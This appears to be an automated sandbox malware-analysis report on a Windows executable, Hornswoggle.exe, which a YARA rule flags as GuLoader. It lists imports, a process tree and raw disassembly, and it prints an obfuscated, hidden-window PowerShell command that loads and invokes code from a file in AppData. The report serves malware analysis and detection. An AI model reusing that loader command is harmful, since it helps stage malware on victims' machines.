                                                      .data0x90000x1a8180x40072dcd89e8824ae186467be61797ed81eFalse0.6474609375data5.220595003364983IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                      .ndata0x240000x140000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                      .rsrc0x380000x1bec00x1c0003d561cd710712943d7c2ece81602a3e4False0.42149135044642855data5.782312893766128IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                      Resources

                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                      RT_ICON0x382f80x10828Device independent bitmap graphic, 128 x 256 x 32, image size 0EnglishUnited States0.1945019519697149
                                                      RT_ICON0x48b200x65ddPNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9937109330060974
                                                      RT_ICON0x4f1000x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishUnited States0.35518672199170126
                                                      RT_ICON0x516a80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishUnited States0.43363039399624764
                                                      RT_ICON0x527500x988Device independent bitmap graphic, 24 x 48 x 32, image size 0EnglishUnited States0.5209016393442623
                                                      RT_ICON0x530d80x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishUnited States0.62677304964539
                                                      RT_DIALOG0x535400x100dataEnglishUnited States0.5234375
                                                      RT_DIALOG0x536400x11cdataEnglishUnited States0.6056338028169014
                                                      RT_DIALOG0x537600xc4dataEnglishUnited States0.5918367346938775
                                                      RT_DIALOG0x538280x60dataEnglishUnited States0.7291666666666666
                                                      RT_GROUP_ICON0x538880x5adataEnglishUnited States0.7888888888888889
                                                      RT_VERSION0x538e80x294OpenPGP Secret KeyEnglishUnited States0.5242424242424243
                                                      RT_MANIFEST0x53b800x33dXML 1.0 document, ASCII text, with very long lines (829), with no line terminatorsEnglishUnited States0.5536791314837153

                                                      Imports

                                                      DLLImport
                                                      KERNEL32.dllCopyFileA, Sleep, GetTickCount, CreateFileA, GetFileSize, GetModuleFileNameA, ReadFile, GetFileAttributesA, SetFileAttributesA, ExitProcess, SetEnvironmentVariableA, GetWindowsDirectoryA, GetTempPathA, GetCommandLineA, lstrlenA, GetVersion, GetCurrentProcess, GetFullPathNameA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, WriteFile, lstrcpyA, MoveFileExA, lstrcatA, GetSystemDirectoryA, GetProcAddress, CloseHandle, SetCurrentDirectoryA, MoveFileA, CompareFileTime, GetShortPathNameA, SearchPathA, lstrcmpiA, SetFileTime, lstrcmpA, ExpandEnvironmentStringsA, lstrcpynA, SetErrorMode, GlobalFree, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, GetPrivateProfileStringA, FindClose, MultiByteToWideChar, FreeLibrary, MulDiv, WritePrivateProfileStringA, LoadLibraryExA, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, GlobalAlloc
                                                      USER32.dllScreenToClient, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, PostQuitMessage, GetWindowRect, EnableMenuItem, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, GetDC, CreateDialogParamA, SetTimer, GetDlgItem, SetWindowLongA, SetForegroundWindow, LoadImageA, IsWindow, SendMessageTimeoutA, FindWindowExA, OpenClipboard, TrackPopupMenu, AppendMenuA, EndPaint, DestroyWindow, wsprintfA, ShowWindow, SetWindowTextA
                                                      GDI32.dllSelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                      SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA
                                                      ADVAPI32.dllRegDeleteKeyA, SetFileSecurityA, OpenProcessToken, LookupPrivilegeValueA, AdjustTokenPrivileges, RegOpenKeyExA, RegEnumValueA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
                                                      COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                      ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

                                                      Possible Origin

                                                      Language of compilation systemCountry where language is spokenMap
                                                      EnglishUnited States

                                                      Network Behavior

                                                      No network behavior found

                                                      Statistics

                                                      CPU Usage

                                                      Click to jump to process

                                                      Memory Usage

                                                      Click to jump to process

                                                      High Level Behavior Distribution

                                                      Click to dive into process behavior distribution

                                                      Behavior

                                                      Click to jump to process

                                                      System Behavior

                                                      General

                                                      Target ID:0
                                                      Start time:08:46:21
                                                      Start date:02/01/2025
                                                      Path:C:\Users\user\Desktop\Hornswoggle.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\Desktop\Hornswoggle.exe"
                                                      Imagebase:0x400000
                                                      File size:583'720 bytes
                                                      MD5 hash:46B874A16BA720EB5D39A0E7F9A87291
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:low
                                                      Has exited:true

                                                      General

                                                      Target ID:2
                                                      Start time:08:46:22
                                                      Start date:02/01/2025
                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:powershell.exe -windowstyle hidden "$Warlordism=gc -raw 'C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Udateret90.Lis';$Gallophile=$Warlordism.SubString(72191,3);.$Gallophile($Warlordism) "
                                                      Imagebase:0xc30000
                                                      File size:433'152 bytes
                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.23291877014.000000000C190000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                      Reputation:high
                                                      Has exited:false

                                                      General

                                                      Target ID:3
                                                      Start time:08:46:22
                                                      Start date:02/01/2025
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff6bf8c0000
                                                      File size:875'008 bytes
                                                      MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:false

                                                      General

                                                      Target ID:4
                                                      Start time:08:47:00
                                                      Start date:02/01/2025
                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                      Imagebase:0xfd0000
                                                      File size:59'904 bytes
                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:5
                                                      Start time:08:47:00
                                                      Start date:02/01/2025
                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                      Imagebase:0xfd0000
                                                      File size:59'904 bytes
                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:6
                                                      Start time:08:47:00
                                                      Start date:02/01/2025
                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                      Imagebase:0xfd0000
                                                      File size:59'904 bytes
                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:7
                                                      Start time:08:47:00
                                                      Start date:02/01/2025
                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                      Imagebase:0xfd0000
                                                      File size:59'904 bytes
                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:8
                                                      Start time:08:47:00
                                                      Start date:02/01/2025
                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                      Imagebase:0xfd0000
                                                      File size:59'904 bytes
                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:9
                                                      Start time:08:47:00
                                                      Start date:02/01/2025
                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                      Imagebase:0xfd0000
                                                      File size:59'904 bytes
                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:10
                                                      Start time:08:47:00
                                                      Start date:02/01/2025
                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                      Imagebase:0xfd0000
                                                      File size:59'904 bytes
                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:11
                                                      Start time:08:47:00
                                                      Start date:02/01/2025
                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                      Imagebase:0xfd0000
                                                      File size:59'904 bytes
                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:12
                                                      Start time:08:47:00
                                                      Start date:02/01/2025
                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                      Imagebase:0xfd0000
                                                      File size:59'904 bytes
                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:13
                                                      Start time:08:47:00
                                                      Start date:02/01/2025
                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                      Imagebase:0xfd0000
                                                      File size:59'904 bytes
                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:14
                                                      Start time:08:47:00
                                                      Start date:02/01/2025
                                                      Path:C:\Windows\SysWOW64\dxdiag.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
                                                      Imagebase:0x3d0000
                                                      File size:222'720 bytes
                                                      MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:15
                                                      Start time:08:47:00
                                                      Start date:02/01/2025
                                                      Path:C:\Windows\SysWOW64\dxdiag.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
                                                      Imagebase:0x3d0000
                                                      File size:222'720 bytes
                                                      MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:16
                                                      Start time:08:47:00
                                                      Start date:02/01/2025
                                                      Path:C:\Windows\SysWOW64\dxdiag.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
                                                      Imagebase:0x3d0000
                                                      File size:222'720 bytes
                                                      MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:17
                                                      Start time:08:47:00
                                                      Start date:02/01/2025
                                                      Path:C:\Windows\SysWOW64\dxdiag.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
                                                      Imagebase:0x3d0000
                                                      File size:222'720 bytes
                                                      MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:18
                                                      Start time:08:47:00
                                                      Start date:02/01/2025
                                                      Path:C:\Windows\SysWOW64\dxdiag.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
                                                      Imagebase:0x3d0000
                                                      File size:222'720 bytes
                                                      MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:19
                                                      Start time:08:47:00
                                                      Start date:02/01/2025
                                                      Path:C:\Windows\SysWOW64\dxdiag.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
                                                      Imagebase:0x3d0000
                                                      File size:222'720 bytes
                                                      MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:20
                                                      Start time:08:47:01
                                                      Start date:02/01/2025
                                                      Path:C:\Windows\SysWOW64\dxdiag.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
                                                      Imagebase:0x3d0000
                                                      File size:222'720 bytes
                                                      MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:21
                                                      Start time:08:47:01
                                                      Start date:02/01/2025
                                                      Path:C:\Windows\SysWOW64\dxdiag.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
                                                      Imagebase:0x3d0000
                                                      File size:222'720 bytes
                                                      MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:22
                                                      Start time:08:47:01
                                                      Start date:02/01/2025
                                                      Path:C:\Windows\SysWOW64\dxdiag.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
                                                      Imagebase:0x3d0000
                                                      File size:222'720 bytes
                                                      MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:23
                                                      Start time:08:47:01
                                                      Start date:02/01/2025
                                                      Path:C:\Windows\SysWOW64\dxdiag.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
                                                      Imagebase:0x3d0000
                                                      File size:222'720 bytes
                                                      MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:24
                                                      Start time:08:47:01
                                                      Start date:02/01/2025
                                                      Path:C:\Windows\SysWOW64\dxdiag.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
                                                      Imagebase:0x3d0000
                                                      File size:222'720 bytes
                                                      MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:25
                                                      Start time:08:47:01
                                                      Start date:02/01/2025
                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                      Imagebase:0xfd0000
                                                      File size:59'904 bytes
                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:26
                                                      Start time:08:47:01
                                                      Start date:02/01/2025
                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                      Imagebase:0xfd0000
                                                      File size:59'904 bytes
                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:27
                                                      Start time:08:47:01
                                                      Start date:02/01/2025
                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                      Imagebase:0xfd0000
                                                      File size:59'904 bytes
                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:28
                                                      Start time:08:47:01
                                                      Start date:02/01/2025
                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                      Imagebase:0xfd0000
                                                      File size:59'904 bytes
                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:29
                                                      Start time:08:47:01
                                                      Start date:02/01/2025
                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                      Imagebase:0xfd0000
                                                      File size:59'904 bytes
                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:30
                                                      Start time:08:47:01
                                                      Start date:02/01/2025
                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                      Imagebase:0xfd0000
                                                      File size:59'904 bytes
                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:31
                                                      Start time:08:47:01
                                                      Start date:02/01/2025
                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                      Imagebase:0xfd0000
                                                      File size:59'904 bytes
                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:32
                                                      Start time:08:47:01
                                                      Start date:02/01/2025
                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                      Imagebase:0xfd0000
                                                      File size:59'904 bytes
                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:33
                                                      Start time:08:47:01
                                                      Start date:02/01/2025
                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                      Imagebase:0xfd0000
                                                      File size:59'904 bytes
                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:34
                                                      Start time:08:47:01
                                                      Start date:02/01/2025
                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                      Imagebase:0xfd0000
                                                      File size:59'904 bytes
                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:35
                                                      Start time:08:47:01
                                                      Start date:02/01/2025
                                                      Path:C:\Windows\SysWOW64\dxdiag.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
                                                      Imagebase:0x3d0000
                                                      File size:222'720 bytes
                                                      MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:36
                                                      Start time:08:47:01
                                                      Start date:02/01/2025
                                                      Path:C:\Windows\SysWOW64\dxdiag.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
                                                      Imagebase:0x3d0000
                                                      File size:222'720 bytes
                                                      MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:37
                                                      Start time:08:47:01
                                                      Start date:02/01/2025
                                                      Path:C:\Windows\SysWOW64\dxdiag.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
                                                      Imagebase:0x3d0000
                                                      File size:222'720 bytes
                                                      MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:38
                                                      Start time:08:47:01
                                                      Start date:02/01/2025
                                                      Path:C:\Windows\SysWOW64\dxdiag.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
                                                      Imagebase:0x3d0000
                                                      File size:222'720 bytes
                                                      MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:39
                                                      Start time:08:47:01
                                                      Start date:02/01/2025
                                                      Path:C:\Windows\SysWOW64\dxdiag.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
                                                      Imagebase:0x3d0000
                                                      File size:222'720 bytes
                                                      MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:40
                                                      Start time:08:47:01
                                                      Start date:02/01/2025
                                                      Path:C:\Windows\SysWOW64\dxdiag.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
                                                      Imagebase:0x3d0000
                                                      File size:222'720 bytes
                                                      MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:41
                                                      Start time:08:47:01
                                                      Start date:02/01/2025
                                                      Path:C:\Windows\SysWOW64\dxdiag.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
                                                      Imagebase:0x3d0000
                                                      File size:222'720 bytes
                                                      MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Disassembly

                                                      Reset < >

                                                        Execution Graph

                                                        Execution Coverage:24.7%
                                                        Dynamic/Decrypted Code Coverage:0%
                                                        Signature Coverage:21.7%
                                                        Total number of Nodes:1276
                                                        Total number of Limit Nodes:37
                                                        execution_graph 3829 401cc2 3830 402a1d 18 API calls 3829->3830 3831 401cd2 SetWindowLongA 3830->3831 3832 4028cf 3831->3832 3833 401a43 3834 402a1d 18 API calls 3833->3834 3835 401a49 3834->3835 3836 402a1d 18 API calls 3835->3836 3837 4019f3 3836->3837 3022 401e44 3023 402a3a 18 API calls 3022->3023 3024 401e4a 3023->3024 3038 40507c 3024->3038 3028 401eb0 CloseHandle 3030 4026a6 3028->3030 3029 401e79 WaitForSingleObject 3031 401e5a 3029->3031 3032 401e87 GetExitCodeProcess 3029->3032 3031->3028 3031->3029 3031->3030 3052 406238 3031->3052 3034 401ea4 3032->3034 3035 401e99 3032->3035 3034->3028 3037 401ea2 3034->3037 3056 405dc1 wsprintfA 3035->3056 3037->3028 3039 405097 3038->3039 3048 401e54 3038->3048 3040 4050b4 lstrlenA 3039->3040 3043 405e85 18 API calls 3039->3043 3041 4050c2 lstrlenA 3040->3041 3042 4050dd 3040->3042 3044 4050d4 lstrcatA 3041->3044 3041->3048 3045 4050f0 3042->3045 3046 4050e3 SetWindowTextA 3042->3046 3043->3040 3044->3042 3047 4050f6 SendMessageA SendMessageA SendMessageA 3045->3047 3045->3048 3046->3045 3047->3048 3049 4055f4 CreateProcessA 3048->3049 3050 405633 3049->3050 3051 405627 CloseHandle 3049->3051 3050->3031 3051->3050 3053 406255 PeekMessageA 3052->3053 3054 406265 3053->3054 3055 40624b DispatchMessageA 3053->3055 3054->3029 3055->3053 3056->3037 3838 402644 3839 40264a 3838->3839 3840 402652 FindClose 3839->3840 3841 4028cf 3839->3841 3840->3841 3842 4026c6 3843 402a3a 18 API calls 3842->3843 3844 4026d4 3843->3844 3845 4026ea 3844->3845 3846 402a3a 18 API calls 3844->3846 3847 405ab1 2 API calls 3845->3847 3846->3845 3848 4026f0 3847->3848 3870 405ad6 GetFileAttributesA CreateFileA 3848->3870 3850 4026fd 3851 4027a0 3850->3851 3852 402709 GlobalAlloc 3850->3852 3855 4027a8 DeleteFileA 3851->3855 3856 4027bb 3851->3856 3853 402722 3852->3853 3854 402797 CloseHandle 3852->3854 3871 4031e3 SetFilePointer 3853->3871 3854->3851 3855->3856 3858 402728 3859 4031cd ReadFile 3858->3859 3860 402731 GlobalAlloc 3859->3860 3861 402741 3860->3861 3862 402775 3860->3862 3864 402f5c 45 API calls 3861->3864 3863 405b7d WriteFile 3862->3863 3865 402781 GlobalFree 3863->3865 3867 40274e 3864->3867 3866 402f5c 45 API calls 3865->3866 3868 402794 3866->3868 3869 40276c GlobalFree 3867->3869 3868->3854 3869->3862 3870->3850 3871->3858 3872 4022c7 3873 402a3a 18 API calls 3872->3873 3874 4022d8 3873->3874 3875 402a3a 18 API calls 3874->3875 3876 4022e1 3875->3876 3877 402a3a 18 API calls 3876->3877 3878 4022eb 